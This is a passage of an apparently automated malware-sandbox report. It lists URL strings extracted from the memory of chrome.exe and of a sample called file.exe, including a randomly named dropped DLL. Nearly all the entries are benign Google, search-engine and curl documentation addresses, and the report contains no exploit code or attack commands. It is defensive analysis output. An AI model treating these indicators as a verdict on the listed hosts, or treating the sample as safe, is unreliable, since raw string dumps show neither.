Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000003.00000002.2482277670.0000002400E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000003.00000003.2454014953.00001214002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2453991229.00001214002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480559941.0000002400988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479834357.000000240071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000003.00000002.2479834357.000000240071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481160056.0000002400B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000003.00000002.2479412191.0000002400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000003.00000002.2478444505.000000240031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actionsA
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultouch
Source: chrome.exe, 00000003.00000002.2479011220.000000240051C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2479011220.000000240051C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000003.00000002.2478444505.000000240031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000003.00000002.2478444505.000000240031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000003.00000002.2478641637.00000024003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2462842380.00000BD8006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477484367.000000240000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000003.00000002.2479412191.0000002400664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000003.00000002.2496381512.00000BD800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000003.00000002.2496381512.00000BD800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000003.00000002.2497555743.00000BD800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480685635.00000024009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000003.2462842380.00000BD8006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000003.00000002.2497530265.00000BD800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477742424.00000024000E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477742424.00000024000E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477742424.00000024000E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000003.00000002.2478641637.00000024003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477742424.00000024000E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2479011220.000000240051C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.2480194859.0000002400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478808223.0000002400490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.2480194859.0000002400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478808223.0000002400490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.2480194859.0000002400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478808223.0000002400490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000002.2480559941.0000002400993000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480784143.0000002400A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478860216.00000024004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482140791.0000002400E0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482140791.0000002400E0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478353569.00000024002E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482140791.0000002400E0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.2473101993.0000002400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2482099705.0000002400DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000002.2480559941.0000002400993000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480784143.0000002400A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478860216.00000024004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.2480784143.0000002400A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478860216.00000024004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.2477646786.000000240008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.2477690698.00000024000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2480085696.00000024007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480061798.00000024007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.2480685635.00000024009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.2478755946.0000002400460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479854413.000000240072C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
